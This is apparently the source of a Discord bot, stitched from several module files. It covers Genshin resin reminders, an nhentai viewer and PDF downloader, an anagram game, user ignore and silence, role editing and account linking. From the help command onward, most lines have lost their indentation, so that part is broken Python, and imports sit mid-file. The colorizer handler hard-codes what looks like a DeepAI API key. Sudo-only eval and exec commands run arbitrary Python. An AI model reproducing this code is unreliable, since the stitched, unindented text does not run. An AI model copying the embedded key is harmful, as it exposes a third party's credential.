        return await get_data("nhentai", nhid)
@client.command("Genshin Commands", ["genshin", "info", "..."], "genshin info <item>", "get info on an item (must enter the internal ID; ask a developer if unsure but it's not too counterintuitive)")
async def command_genshin_info(command, message):
    # Join the remaining arguments into one lowercase internal item ID and
    # delegate the lookup/display to the client helper.
    query = " ".join(command[3:]).lower()
    await client.genshin_info(query, message.channel)
    await message.add_reaction("✅")
async def resin_set(user, amt):
    # Store the timestamp at which the user would have had zero resin
    # (resin regenerates at 1 per 8 minutes), so the current amount can
    # always be derived from elapsed time alone.
    zero_point = time.time() - 8 * 60 * amt
    await set_data("genshin", "resin_info", user.id, zero_point)
async def resin_rmd(user):
    # The resin threshold the user asked to be reminded at, or -1 when no
    # reminder is set.
    threshold = await get_data("genshin", "resin_reminder", user.id, default = -1)
    return threshold
async def resin_amount(uid):
    # Derive the user's current resin (capped at 160) from the stored
    # zero-resin timestamp; returns -1 if the user never set their resin.
    if not await has_data("genshin", "resin_info", uid):
        return -1
    elapsed = time.time() - await get_data("genshin", "resin_info", uid)
    return min(160, elapsed / 8 / 60)
def hm(s):
    """Format *s* seconds as a compact duration: "Hh MM" style ("1h05") when
    at least an hour, otherwise just minutes ("42m")."""
    hours, minutes = divmod(int(s // 60), 60)
    if hours:
        return f"{hours}h{minutes:02}"
    return f"{minutes}m"
@client.command("Genshin Commands", ["genshin", "resin", "set", "?"], "genshin resin set <amount>", "tell me how much resin you currently have")
async def command_genshin_resin_set(command, message):
    # Record the user's current resin, then confirm (mentioning any pending
    # reminder and its new ETA).
    amount = int(command[4])
    await resin_set(message.author, amount)
    reminder = await resin_rmd(message.author)
    suffix = "" if reminder == -1 else f" Your existing reminder, set for {reminder} resin, will occur in {hm(8 * 60 * (reminder - amount))}."
    msg = await send(message, "Set your resin!" + suffix)
    if message.guild:
        # Tidy up in servers: drop the command and confirmation shortly after.
        await message.delete(delay = 5)
        await msg.delete(delay = 5)
@client.command("Genshin Commands", ["genshin", "resin", "now"], "genshin resin now", "check how much resin you currently have")
async def command_genshin_resin_now(command, message):
    # Report the user's derived current resin, plus any pending reminder ETA.
    amount = await resin_amount(message.author.id)
    reminder = await resin_rmd(message.author)
    if amount == -1:
        await send(message, "You haven't told me how much resin you have yet!", reaction = "x")
        return
    suffix = "" if reminder == -1 else f" Your reminder, set for {reminder} resin, will occur in {hm(8 * 60 * (reminder - amount))}."
    await send(message, f"You currently have {int(amount)} resin!" + suffix)
@client.command("Genshin Commands", ["genshin", "resin", "reminder"], "genshin resin reminder [[amount] <desired = 160>] / stop", "set / stop a reminder for when you reach a specific amount of resin; your current amount is optional if you've already set your resin amount")
@client.command("", ["genshin", "resin", "reminder", "?"], "", "")
@client.command("", ["genshin", "resin", "reminder", "?", "?"], "", "")
async def command_genshin_resin_reminder(command, message):
    """Create, replace, or cancel a resin reminder.

    Forms (matched by the three decorators above):
      genshin resin reminder                    -> remind at 160
      genshin resin reminder stop               -> cancel the reminder
      genshin resin reminder <desired>          -> remind at <desired> (resin must already be set)
      genshin resin reminder <amount> <desired> -> record current resin, then remind at <desired>
    """
    if len(command) == 5 and command[4] == "stop":
        msg = await send(message, "I will no longer remind you about your resin!")
        await del_data("genshin", "resin_reminder", message.author.id)
    else:
        if len(command) <= 5:
            # Only a desired amount (or nothing) was given, so the user's
            # current resin must already be on record.
            if not await has_data("genshin", "resin_info", message.author.id):
                raise BotError("You need to tell me how much resin you have with `genshin resin set` or specify the amount you currently have!")
            des = int(command[4]) if len(command) == 5 else 160
            amt = await resin_amount(message.author.id)
        else:
            # Both current and desired amounts were given; store the current one.
            amt = int(command[4])
            await resin_set(message.author, amt)
            des = int(command[5])
        if des > 160:
            raise BotError("You cannot have more than 160 resin without using Fragile Resin to exceed that cap manually!")
        if des <= amt:
            raise BotError("You already have that much resin!")
        cur = await resin_rmd(message.author)
        if cur == -1:
            msg = await send(message, f"I will remind you when you reach {des} resin (in {hm(8 * 60 * (des - amt))})!")
        else:
            msg = await send(message, f"You previously had a reminder for when you reached {cur} resin; I will instead remind you when you reach {des} (in {hm(8 * 60 * (des - amt))})!")
        await set_data("genshin", "resin_reminder", message.author.id, des)
    # Tidy up in servers: drop the command and confirmation shortly after.
    if message.guild:
        await message.delete(delay = 5)
        await msg.delete(delay = 5)
@client.command("", [("nhentai", "fnhentai"), "?"], "", "")
async def command_nhentai(command, message):
    # Post page 1 of the gallery as a paginated embed; the arrow reactions
    # are handled elsewhere via the "nhentai_embed" data key.
    gallery_id = int(command[2])
    force_refresh = command[1] == "fnhentai"
    title, subtitle, sauce, urls = await nhentai(gallery_id, force_refresh)
    embed = discord.Embed(title = title + " " + subtitle, url = f"https://nhentai.net/g/{gallery_id}", description = f"Page 1 / {len(urls)}").set_image(url = urls[0])
    reply = await send(message, embed = embed)
    await reply.add_reaction("⬅️")
    await reply.add_reaction("➡️")
    await set_data("nhentai_embed", reply.id, (gallery_id, 0))
import httpx
import img2pdf, os
from PIL import Image
from PyPDF3 import PdfFileMerger
from io import BytesIO
async def get_async(url):
    """Fetch *url* asynchronously and return the httpx response.

    Fix: the context-manager variable was named `client`, shadowing the
    module-level discord `client` object inside this function; renamed to
    `http_client` to avoid confusion."""
    async with httpx.AsyncClient() as http_client:
        return await http_client.get(url)
@client.command("", ["nhdownload", "?"], "", "")
async def command_nhdownload(command, message):
    """Download an entire gallery, convert each page image to a PDF, merge
    the pages into one file under /tmp, and upload it (falling back to a
    hosted link when the file exceeds Discord's upload limit)."""
    async with message.channel.typing():
        nhid = int(command[2])
        title, subtitle, sauce, urls = await nhentai(nhid, True)
        try:
            os.mkdir(f"/tmp/{nhid}")
        except:
            # Directory may already exist from a previous download attempt.
            pass
        merger = PdfFileMerger()
        # Fetch every page concurrently; gather preserves page order.
        responses = await asyncio.gather(*map(get_async, urls))
        for page, r in enumerate(responses):
            pdf_path = f"/tmp/{nhid}/{page}.pdf"
            pdf_bytes = img2pdf.convert(r.content)
            with open(pdf_path, "wb") as f:
                f.write(pdf_bytes)
            merger.append(pdf_path)
        final_path = f"/tmp/{nhid}/final.pdf"
        merger.write(final_path)
        merger.close()
        try:
            with open(final_path, "rb") as f:
                await send(message, file = discord.File(fp = f, filename = f"[{nhid}] {title}.pdf"))
        except:
            # Discord rejects files over the upload limit; fall back to a link.
            await send(message, f"The file is too large to upload; you can access it here: https://dev.hyper-neutrino.xyz/nh/{nhid}")
@client.command("", lambda m: True, "", "")
async def command_image_spoiler_reply(command, message):
    # Relay images DM'd to the bot into the channel the author registered
    # with `spoiler image`, wrapped as spoilers, then clear the registration.
    if type(message.channel) != discord.DMChannel:
        return
    if not message.attachments:
        return
    if await has_data("dm_spoiler", message.author.id):
        target = client.get_channel(await get_data("dm_spoiler", message.author.id))
        await target.send(files = [(await attachment.to_file(spoiler = True)) for attachment in message.attachments])
        await del_data("dm_spoiler", message.author.id)
@client.command("", lambda m: True, "", "")
async def command_image_color_reply(command, message):
    """Auto-color the author's registered next image via the DeepAI colorizer
    and post the result URL, then clear the registration.

    Renamed from command_image_spoiler_reply: the original name duplicated
    the DM-spoiler handler's and shadowed it at module level.

    NOTE(review): the DeepAI API key is hard-coded here; it should live in
    the config file alongside the other API keys."""
    if len(message.attachments) > 0:
        if await has_data("img_color", message.author.id, message.channel.id):
            r = requests.post("https://api.deepai.org/api/colorizer", data = {"image": message.attachments[0].url}, headers = {"api-key": "551549c3-8d2c-426b-ae9f-9211b13e6f14"})
            await send(message, r.json()["output_url"])
            await del_data("img_color", message.author.id, message.channel.id)
@client.command("", ["echo", "..."], "echo <message>", "echo the message")
async def command_echo(command, message):
    # Repeat everything after the literal "echo" token in the raw message.
    start = message.content.find("echo") + 4
    await send(message, message.content[start:])
@client.command("", ["say", "..."], "say <message>", "echo, then immediately delete the command")
async def command_say(command, message):
    # Repeat everything after the literal "say" token, then remove the
    # invoking message so only the echo remains.
    start = message.content.find("say") + 3
    await send(message, message.content[start:])
    await message.delete()
@client.command("", ["eval", "?", "..."], "eval <expr>", "evaluate a Python expression in a command function's scope")
async def command_eval(command, message):
    # Sudo-only debugging hook: evaluates arbitrary Python. The sudo check
    # is the only safeguard - never extend this to non-sudo users.
    if message.author.id not in config["sudo"]:
        await send(message, "You must be a sudo user to do that!", reaction = "x")
    else:
        try:
            # Take the raw text after "eval" and strip code-block fencing.
            code = message.content[message.content.find("eval") + 4:].strip()
            if code.startswith("```python"):
                code = code[9:]
            elif code.startswith("```py"):
                code = code[5:]
            code = code.strip("`")
            # Truncate to Discord's 2000-character message limit.
            await send(message, str(eval(code))[:2000])
        except:
            await send(message, "Error evaluating expression!", reaction = "x")
@client.command("", ["exec", "?", "..."], "exec <code>", "execute Python code in a command function's scope (print is replaced with message output)")
async def command_exec(command, message):
    # Sudo-only debugging hook: executes arbitrary Python. The sudo check
    # is the only safeguard - never extend this to non-sudo users.
    if message.author.id not in config["sudo"]:
        await send(message, "You must be a sudo user to do that!", reaction = "x")
    else:
        try:
            # Take the raw text after "exec" and strip code-block fencing.
            code = message.content[message.content.find("exec") + 4:].strip()
            if code.startswith("```python"):
                code = code[9:]
            elif code.startswith("```py"):
                code = code[5:]
            code = code.strip("`")
            output = []
            # Deliberately shadows the builtin so print() inside the executed
            # code accumulates characters into `output` instead of stdout.
            def print(*items, end = "\n", sep = " "):
                output.extend(list(sep.join(map(str, items)) + end))
            exec(code)
            # 1980 characters of captured output + fencing stays under 2000.
            await send(message, "```python\n" + "".join(output[:1980]) + "\n```")
        except:
            await send(message, "Error executing expression!", reaction = "x")
@client.command("", ["adjust", "ehecd", "?"], "adjust ehecd <x>", "adjust the cooldown of ehe te nandayo")
async def command_adjust_ehecd(command, message):
    """Set the cooldown (in seconds) of the 'ehe te nandayo' auto-response.
    Sudo-only.

    Renamed from command_exec: the original name duplicated the exec
    handler's and shadowed it at module level."""
    if message.author.id not in config["sudo"]:
        await send(message, "You must be a sudo user to do that!", reaction = "x")
    else:
        try:
            await set_data("ehecd", int(command[3]))
            await send(message, f"Cooldown of 'ehe te nandayo' is now {command[3]} second{'s' * (command[3] != '1')}!")
        except:
            await send(message, "Error; make sure you entered an integer!", reaction = "x")
@client.command("", ["data", "..."], "data", "fetch data from the bot")
async def command_data(command, message):
    # Sudo-only debugging hook: each argument is eval'd to build the data
    # key path, so this must stay restricted to sudo users.
    if message.author.id not in config["sudo"]:
        await send(message, "You must be a sudo user to do that!")
    else:
        # Truncated to fit Discord's 2000-character limit with the fencing.
        await send(message, "```python\n" + str(await get_data(*map(eval, command[2:]), default = None, set_if_missing = False))[:1980] + "\n```")
@client.command("", ["identify", "?"], "identify <user>", "identify a user")
async def command_identify(command, message):
    # Resolve the argument to a member and echo their identifying details
    # without actually pinging them.
    target = await get_member(message.guild, command[2], message.author)
    details = f"Identified {target.name}#{target.discriminator}, a.k.a {target.display_name}, I.D. {target.id} ({target.mention})"
    await send(message, details, allowed_mentions = discord.AllowedMentions.none())
@client.command("", ["emoji", "?", "-"], "", "")
@client.command("", ["emoji", "?"], "emoji <lookup> [-]", "post an emoji by lookup ID")
async def command_emoji(command, message):
    # Post the emoji for the given lookup ID; a trailing "-" argument
    # (second decorator form) deletes the invoking message afterwards.
    delete_invocation = len(command) == 4
    try:
        await send(message, str(emoji(command[2])))
        if delete_invocation:
            await message.delete()
    except:
        await send(message, "That resulted in an error.", reaction = "x")
        raise
@client.command("", [("summary", "summarize"), "?"], "", "")
@client.command("", [("summary", "summarize"), "?", "?"], "", "")
@client.command("", [("summary", "summarize"), "?", "?", "?"], "", "")
async def command_summarize(command, message):
    """Summarize a web page via the SMMRY API.

    Arguments: <url> [sentence count] [keyword count]."""
    url = command[2]
    # Strip Discord's <...> link-preview suppression markers if present.
    if url[0] == "<" and url[-1] == ">":
        url = url[1:-1]
    await message.edit(suppress = True)
    rurl = f"https://api.smmry.com/?SM_API_KEY={config['api-keys']['sm']}"
    if len(command) >= 4:
        rurl += "&SM_LENGTH=" + command[3]
    if len(command) >= 5:
        rurl += "&SM_KEYWORD_COUNT=" + command[4]
    rurl += "&SM_URL=" + url
    r = requests.get(rurl)
    data = r.json()
    # SMMRY reports failures via an sm_api_error code in the JSON body
    # rather than via the HTTP status.
    if "sm_api_error" in data:
        error = data["sm_api_error"]
        if error == 0:
            await send(message, "Internal server problem with the SMMRY API; this is not your fault. Try again later.", reaction = "x")
        elif error == 1:
            await send(message, "Parameters are invalid. Check that you entered a real URL; otherwise, contact a developer.", reaction = "x")
        elif error == 2:
            await send(message, "This request has intentionally been restricted. Perhaps you have expended the API key's limit (100 per day).", reaction = "x")
        elif error == 3:
            await send(message, "Summarization error. This website might not be summarizable.")
    else:
        # Truncate to Discord's 2000-character message limit.
        await send(message, (f"**{data['sm_api_title'].strip() or '(no title)'}**\n\n{data['sm_api_content'].strip() or '(no content)'}")[:2000])
        if "sm_api_keyword_array" in data:
            await message.channel.send(f"**Keywords**: {', '.join(data['sm_api_keyword_array'])}")
@client.command("", ["tsr", "?"], "", "")
async def command_toggle_suppress_reacts(command, message):
    # Toggle the target user's membership in the "tsr" (suppress reactions)
    # set via symmetric difference.
    target = await get_member(message.guild, command[2], message.author)
    await mod_data("tsr", lambda members: members ^ {target.id}, default = set())
    await message.add_reaction("✅")
@client.command("", ["react", "..."], "", "")
async def command_react(command, message):
    # Add each named emoji as a reaction to the replied-to message; report
    # any lookups that fail, otherwise delete the invocation.
    if not message.reference or not message.reference.resolved:
        raise BotError("You need to refer to a message via reply!")
    failures = []
    for name in command[2:]:
        try:
            await message.reference.resolved.add_reaction(emoji(name))
        except:
            failures.append(name)
    if failures:
        await send(message, "The following emojis do not exist / could not have been added: " + ", ".join(failures))
    else:
        await message.delete()
# @client.command("", re.compile(r"\b[hH]?[eE][hH][eE]\b").search, "", "")
async def command_ehe_te_nandayo(command, message):
    # Easter egg, currently disabled (decorator commented out): replies
    # "ehe te nandayo!?" when someone says "ehe", rate-limited per user by
    # the configurable "ehecd" cooldown (default 30 seconds).
    if message.author != client.user and time.time() - await get_data("ehe", message.author.id, default = 0) > (await get_data("ehecd", default = 30)):
        await send(message, "**ehe te nandayo!?**", reaction = "?")
        await set_data("ehe", message.author.id, time.time())
# @client.command("", re.compile(r"\[\w+\]").search, "", "")
async def command_emoji_react(command, message):
    # Easter egg, currently disabled (decorator commented out): reacts with
    # every emoji named in [brackets] in the message, silently skipping
    # names that don't resolve.
    for c in re.findall(r"\[(\w+)\]", message.content):
        try:
            await message.add_reaction(emoji(c))
        except:
            pass
# @client.command("", re.compile(r"\b[Aa][Oo][Cc]\b").search, "", "")
async def command_aoc(command, message):
    # Easter egg, currently disabled (decorator commented out): expands
    # "AOC" to the full name.
    await message.channel.send("Alexandria Ocasio-Cortez")
# @client.command("", ["toggle69"], "", "")
async def command_toggle69(command, message):
    # Admin toggle for the "69" easter egg below, currently disabled
    # (decorator commented out): flips the "disable_69" flag.
    await set_data("disable_69", not await get_data("disable_69", default = False))
    await message.add_reaction("✅")
# @client.command("", re.compile(r"\b69\b").search, "", "")
async def command_69(command, message):
    # Easter egg, currently disabled (decorator commented out): replies
    # "nice" to any message containing 69, unless the "disable_69" flag
    # has been set via the toggle above.
    if await get_data("disable_69", default = False):
        return
    await message.reply("nice", mention_author = False)
from aioconsole import ainput
from word2number import w2n
from client import *
from datamanager import config, del_data, get_data, has_data, mod_data, set_data, batch_set_data
from discordutils import *
from league import *
async def dm(user, *a, **k):
channel = user.dm_channel
if channel is None:
channel = await user.create_dm()
await channel.send(*a, **k)
@client.command("", ["help"], "", "")
@client.command("General Commands", ["help", "rpg"], "help [rpg]", "post a list of commands")
async def command_help(command, message):
sections = {}
for section, _, syntax, description, _ in client.commands:
if section == "" or ((section == "RPG Commands") ^ (len(command) == 3)): continue
if section not in sections:
sections[section] = []
sections[section].append(f"`{syntax}` - {description}")
embed = discord.Embed(
title = "Help - Commands",
color = client.color
)
for section in sections:
embed.add_field(name = section, value = "\n".join(sections[section]), inline = False)
await dm(message.author, embed = embed)
await send(message, "Sent the command list to your DMs!")
@client.command("General Commands", ["ping"], "ping", "check your ping")
async def command_ping(command, message):
ping = int((time.time() - (message.created_at - datetime.datetime(1970, 1, 1)) / datetime.timedelta(seconds = 1)) * 1000)
await send(message, f"Pong! ({ping} ms)", reaction = "🏓")
@client.command("Channel Type Commands", ["subscribe"], "subscribe", "announce updates to this channel")
async def command_subscribe(command, message):
await mod_data("announcement_channels", lambda x: x | {message.channel.id}, default = set())
await send(message, "Subscribed to status updates here!")
@client.command("Channel Type Commands", ["unsubscribe"], "unsubscribe", "stop announcing updates to this channel")
async def command_unsubscribe(command, message):
await mod_data("announcement_channels", lambda x: x - {message.channel.id}, default = set())
await send(message, "Unsubscribed from status updates here!")
@client.command("Channel Type Commands", ["watch", ("osu", "genshin")], "watch osu/genshin", "watch osu!/Genshin Impact updates here")
async def command_watch(command, message):
await mod_data("watch_channels", command[2], lambda x: x | {message.channel.id}, default = set())
await send(message, "Now watching " + {"osu": "osu!", "genshin": "Genshin Impact"}[command[2]] + " updates in this channel!")
@client.command("Channel Type Commands", ["unwatch", ("osu", "genshin")], "unwatch osu/genshin", "stop watching osu!/Genshin Impact updates here")
async def command_watch(command, message):
await mod_data("watch_channels", command[2], lambda x: x - {message.channel.id}, default = set())
await send(message, "No longer watching " + {"osu": "osu!", "genshin": "Genshin Impact"}[command[2]] + " updates in this channel!")
words = None
wordmap = {}
with open("data/words.txt") as f:
words = [x for x in f.read().strip().splitlines() if 5 <= len(x)]
for word in words:
key = "".join(sorted(word))
if key not in wordmap:
wordmap[key] = set()
wordmap[key].add(word)
anagram_lock = asyncio.Lock()
def display(actual, scrambled, hint):
if hint == 0: return scrambled
cl = list(scrambled)
start = actual[:hint if hint * 2 <= len(actual) else -hint]
end = actual[-hint:]
for c in start + end:
cl.remove(c)
return f"**{start}**{''.join(cl)}**{end}**"
async def anagram_function(message, answer = None, start = False, stop = False, hint = False, reorder = False):
global words, wordmap
async with anagram_lock:
active = await has_data("anagram", message.channel.id, "puzzle")
puzzle = await get_data("anagram", message.channel.id, "puzzle", default = "", set_if_missing = False)
answers = wordmap.get("".join(sorted(puzzle)), set())
current_hint = await get_data("anagram", message.channel.id, "hint", default = 0, set_if_missing = False)
if reorder:
if active:
charlist = list(puzzle)
random.shuffle(charlist)
puzzle = "".join(charlist)
await set_data("anagram", message.channel.id, "puzzle", puzzle)
await send(message, f"Reordered: solve for '{display(sorted(answers)[0], puzzle, current_hint)}' ({len(puzzle)}).")
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if hint:
if active:
if len(puzzle) - current_hint * 2 - 2 <= 1:
stop = True
else:
await set_data("anagram", message.channel.id, "hint", current_hint + 1)
await send(message, f"Hint: 2 more letters shown: solve for '{display(sorted(answers)[0], puzzle, current_hint + 1)}' ({len(puzzle)}).")
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if stop:
if active:
if len(answers) == 1:
await send(message, f"Anagram puzzle ended! The correct answer was '{list(answers)[0]}'.")
else:
await send(message, f"Anagram puzzle ended! The correct answers were {english_list(quote(answers))}.")
await del_data("anagram", message.channel.id)
active = False
else:
await send(message, "There is no ongoing anagram puzzle in this channel!", reaction = "x")
if active and answer in answers:
try:
points = len(answer) - 2 * await get_data("anagram", message.channel.id, "hint")
bonus = int(points / 2) * (time.time() - await get_data("anagram", message.channel.id, "timestamp", default = 0) <= 5)
await mod_data("leaderboard", "anagram", message.author.id, lambda x: x + points + bonus, default = 0)
await batch_set_data("anagram", message.channel.id, active = False, last = answers, lasttime = time.time())
active = False
bonus_display = f" **+{bonus}**" if bonus else ""
alt_display = f" (Alternative answers: {english_list(quote(answers - {answer}))})" if len(answers) > 1 else ""
await send(message, f"Congratulations to {message.author.mention} for winning the anagram puzzle! (+{points}{bonus_display}){alt_display}", allowed_mentions = discord.AllowedMentions.none())
start = True
except:
print(traceback.format_exc())
elif answer in await get_data("anagram", message.channel.id, "last", default = set()) and time.time() - await get_data("anagram", message.channel.id, "lasttime", default = 0) <= 1:
await send(message, f"{message.author.mention} L", reaction = "x", allowed_mentions = discord.AllowedMentions.none())
if start:
if active:
hint = await get_data("anagram", message.channel.id, "hint", default = 0)
actual = sorted(answers)[0]
await send(message, f"An anagram puzzle is already running! Solve for '{display(actual, puzzle, hint)}' ({len(puzzle)}).", reaction = "x")
else:
word = random.choice(words)
charlist = list(word)
random.shuffle(charlist)
scrambled = "".join(charlist)
await batch_set_data("anagram", message.channel.id, active = True, puzzle = scrambled, hint = 0, timestamp = time.time())
await send(message, f"Anagram puzzle! Solve for '{scrambled}' ({len(word)}).")
@client.command("Anagram Commands", ["anagram"], "anagram start", "start an anagram puzzle")
async def command_anagram_start(command, message):
await anagram_function(message, start = True)
@client.command("Anagram Commands", ["anagram", "restart"], "anagram restart", "restart the anagram puzzle")
async def command_anagram_restart(command, message):
await anagram_function(message, stop = True, start = True)
@client.command("Anagram Commands", ["anagram", "stop"], "anagram stop", "stop the anagram puzzle")
async def command_anagram_stop(command, message):
await anagram_function(message, stop = True)
@client.command("Anagram Commands", ["anagram", "shuffle"], "anagram shuffle", "alias for `anagram reorder`")
@client.command("Anagram Commands", ["anagram", "scramble"], "anagram scramble", "alias for `anagram reorder`")
@client.command("Anagram Commands", ["anagram", "reorder"], "anagram reorder", "reorder the anagram puzzle")
async def command_anagram_reorder(command, message):
await anagram_function(message, reorder = True)
@client.command("Anagram Commands", ["anagram", "hint"], "anagram hint", "show another character in the anagram puzzle")
async def command_anagram_hint(command, message):
await anagram_function(message, hint = True)
@client.command("Anagram Commands", ["anagram", "add", "?"], "anagram add <word>", "add a word to the anagram dictionary")
async def command_anagram_add(command, message):
global words, wordmap
word = command[3].strip().lower()
if all(char in "abcdefghijklmnopqrstuvwxyz" for char in word):
if word in words:
await send(message, "This word is already in the dictionary!", reaction = "x")
else:
words.append(word)
words.sort()
with open("data/words.txt", "w") as f:
f.write("\n".join(words))
key = "".join(sorted(word))
if key not in wordmap:
wordmap[key] = set()
wordmap[key].add(word)
await send(message, f"Added '{word}' to the dictionary!")
else:
await send(message, "Words must only contain letters!", reaction = "x")
@client.command("Anagram Commands", ["anagram", "rm", "?"], "anagram rm <word>", "alias for `anagram remove`")
@client.command("Anagram Commands", ["anagram", "remove", "?"], "anagram remove <word>", "remove a word from the anagram dictionary")
async def command_anagram_remove(command, message):
global words, wordmap
word = command[3].strip().lower()
if word in words:
words.remove(word)
with open("data/words.txt", "w") as f:
f.write("\n".join(words))
key = "".join(sorted(word))
wordmap[key].discard(word)
await send(message, f"Removed '{word}' from the dictionary!")
else:
await send(message, "This word is not in the dictionary!", reaction = "x")
@client.command("Anagram Commands", ["anagram", "lb"], "anagram lb", "alias for `anagram leaderboard`")
@client.command("Anagram Commands", ["anagram", "leaderboard"], "anagram leaderboard", "show the leaderboard for the anagram puzzle")
async def command_anagram_leaderboard(command, message):
scores = []
scoremap = await get_data("leaderboard", "anagram")
for member in message.guild.members:
score = scoremap.get(member.id, 0)
if score:
scores.append((score, member))
scores.sort(reverse = True)
await send(message, embed = discord.Embed(
title = "Leaderboard - Anagram",
description = "\n".join(f"{member.mention} - {score}" for score, member in scores)
))
@client.command("", lambda m: True, "", "")
async def command_anagram_answer(command, message):
try:
await anagram_function(message, answer = message.content.strip().strip("!@#$%^&*()[]{}/|\.,<>\"'").lower())
except:
pass
@client.command("User Commands", ["alias", "?", "?"], "alias <name> <user>", "alias a name to a user")
async def command_alias(command, message):
member = await get_member(message.guild, command[3], message.author)
await set_data("aliases", message.guild.id, command[2].lower(), member.id)
await send(message, f"Aliased '{command[2].lower()}' to {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("User Commands", ["unalias", "?"], "unalias <name>", "remove a name's alias")
async def command_unalias(command, message):
await set_data("aliases", message.guild.id, command[2].lower(), None)
await send(message, f"Removed the alias for '{command[2].lower()}'!")
@client.command("User Commands", ["unbonk", "?", "..."], "unbonk <user>", "alias for `unignore`")
@client.command("User Commands", ["unignore", "?", "..."], "unignore <user>", "make the bot no longer ignore messages from a particular user (on a server)")
@client.command("User Commands", ["bonk", "?", "..."], "bonk <user>", "alias for `ignore`")
@client.command("User Commands", ["ignore", "?", "..."], "ignore <user>", "make the bot ignore all messages from a particular user (on a server)")
async def command_ignore(command, message):
for uinfo in command[2:]:
member = await get_member(message.guild, uinfo, message.author)
if not command[1].startswith("un") and member == message.author:
await send(message, f"You cannot {command[1]} yourself!", reaction = "x")
else:
await set_data("ignore", message.guild.id, member.id, not command[1].startswith("un"))
await send(message, f"No longer ignoring {member.mention}!" if command[1].startswith("un") else f"{'Bonk! ' * (command[1] == 'bonk')}Now ignoring {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
# NOTE(review): the usage/description strings previously duplicated the
# ignore/bonk help text ("bonk <user>" for shut, and unsilence described as
# "make the bot delete messages..."); corrected to describe silence itself.
@client.command("User Commands", ["unshut", "?", "..."], "unshut <user>", "alias for `unsilence`")
@client.command("User Commands", ["unsilence", "?", "..."], "unsilence <user>", "make the bot stop deleting messages from a particular user (on a server)")
@client.command("User Commands", ["shut", "?", "..."], "shut <user>", "alias for `silence`")
@client.command("User Commands", ["silence", "?", "..."], "silence <user>", "make the bot delete messages from a particular user (on a server)")
async def command_silence(command, message):
    """Toggle the per-member 'silence' flag; silenced members' messages are deleted elsewhere."""
    for uinfo in command[2:]:
        member = await get_member(message.guild, uinfo, message.author)
        if not command[1].startswith("un") and member == message.author:
            await send(message, f"You cannot {command[1]} yourself!", reaction = "x")
        else:
            await set_data("silence", message.guild.id, member.id, not command[1].startswith("un"))
            await send(message, f"No longer silencing {member.mention}!" if command[1].startswith("un") else f"{'https://i.redd.it/l5jmlb1ltqj51.jpg' * (command[1] == 'shut')}Now silencing {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
# @client.command("Role Commands", ["gib", "?", "..."], "gib <name> [roles...]", "alias for `role give`")
# @client.command("Role Commands", ["role", "give", "?", "..."], "role give <name> [roles...]", "give a list of roles to a user")
# async def command_role_give(command, message):
# user, *names = command[2 if command[1] == "gib" else 3:]
# member = await get_member(message.guild, user, message.author)
# roles = [get_role(message.guild, string) for string in names]
# if any(role.id == 741731868692709416 for role in roles) and member.id != 251082987360223233:
# await send(message, f"<@&741731868692709416> is exclusive to <@!251082987360223233>!", allowed_mentions = discord.AllowedMentions.none())
# else:
# await member.add_roles(*roles)
# await send(message, f"Granted {english_list(quote(role.mention for role in roles))} to {member.mention}!", allowed_mentions = discord.AllowedMentions(roles = False))
# @client.command("Role Commands", ["gibnt", "?", "..."], "gibnt <name> [roles...]", "alias for `role remove`")
# @client.command("Role Commands", ["role", "remove", "?", "..."], "role remove <name> [roles...]", "remove a list of roles from a user")
# async def command_role_remove(command, message):
# user, *names = command[2 if command[1] == "gibnt" else 3:]
# member = await get_member(message.guild, user, message.author)
# roles = [get_role(message.guild, string) for string in names]
# await member.remove_roles(*roles)
# await send(message, f"Removed {english_list(quote(role.mention for role in roles))} from {member.mention}!", allowed_mentions = discord.AllowedMentions(roles = False))
@client.command("", ["role", "colour", "?"], "", "")
@client.command("", ["role", "color", "?"], "", "")
@client.command("Role Commands", ["role", "colour", "?", "?"], "role colour <role> [colour = 0]", "alias for `role color`")
@client.command("Role Commands", ["role", "color", "?", "?"], "role color <role> [color = 0]", "recolor a role, or remove its color")
async def command_role_color(command, message):
    # Default to "0" (no color) when the color argument is omitted.
    color_arg = command[4] if len(command) > 4 else "0"
    role = get_role(message.guild, command[3])
    await role.edit(color = get_color(color_arg))
    await send(message, f"Recolored '{role.mention}'!", allowed_mentions = discord.AllowedMentions.none())
@client.command("Role Commands", ["role", "rename", "?", "?"], "role rename <role> <name>", "rename a role")
async def command_role_rename(command, message):
    # Capture the old name before editing so the confirmation can show both.
    role = get_role(message.guild, command[3])
    old_name = role.name
    await role.edit(name = command[4])
    await send(message, f"Renamed '{old_name}' to '{command[4]}'!")
# Map of user-facing service aliases to the canonical service keys used in
# the "external" data store (e.g. both "league" and "lol" store under "lol").
services = {
    "lol": "lol",
    "league": "lol",
    "dmoj": "dmoj",
    "cf": "cf",
    "codeforces": "cf",
    "osu": "osu",
    "ow": "ow",
    "overwatch": "ow"
}
# All accepted alias spellings; used to build the command matchers below.
service_list = tuple(services)
@client.command("", [service_list, "link", "?"], "", "")
@client.command("External User Commands", [service_list, "link", "?", "?"], "<lol/league | cf/codeforces | dmoj | osu | ow/overwatch> link [user = me] <account>", "link a user to an external account")
async def command_link(command, message):
    # With the 5-token form the third argument names the member; otherwise
    # link the message author ("me").
    service = services[command[1]]
    target = command[3] if len(command) == 5 else "me"
    member = await get_member(message.guild, target, message.author)
    await set_data("external", service, member.id, command[-1])
    await send(message, f"Linked {member.mention} to {command[-1]}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("", [service_list, "unlink"], "", "")
@client.command("External User Commands", [service_list, "unlink", "?"], "<lol/league | cf/codeforces | dmoj | osu | ow/overwatch> unlink [user = me]", "unlink a user from a service")
async def command_unlink(command, message):
    """Remove a member's stored external-account link for the given service.

    Renamed from `command_link`, which shadowed the link handler defined just
    above at module level; registration happens via the decorators, so
    behavior is unchanged, but the duplicate name was misleading.
    """
    service = services[command[1]]
    member = await get_member(message.guild, command[3] if len(command) == 4 else "me", message.author)
    await del_data("external", service, member.id)
    await send(message, f"Unlinked {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
async def get_ext_user(key, error, command, message):
    """Resolve the external-account handle for a service command.

    With no explicit argument (len(command) == 3), return the author's linked
    account for service `key`, or raise BotError using `error` as the noun in
    the message. Otherwise try to resolve command[3] as a member and return
    that member's linked account; if member lookup fails or the member is not
    linked, fall back to treating command[3] as a literal account name.
    """
    if len(command) == 3:
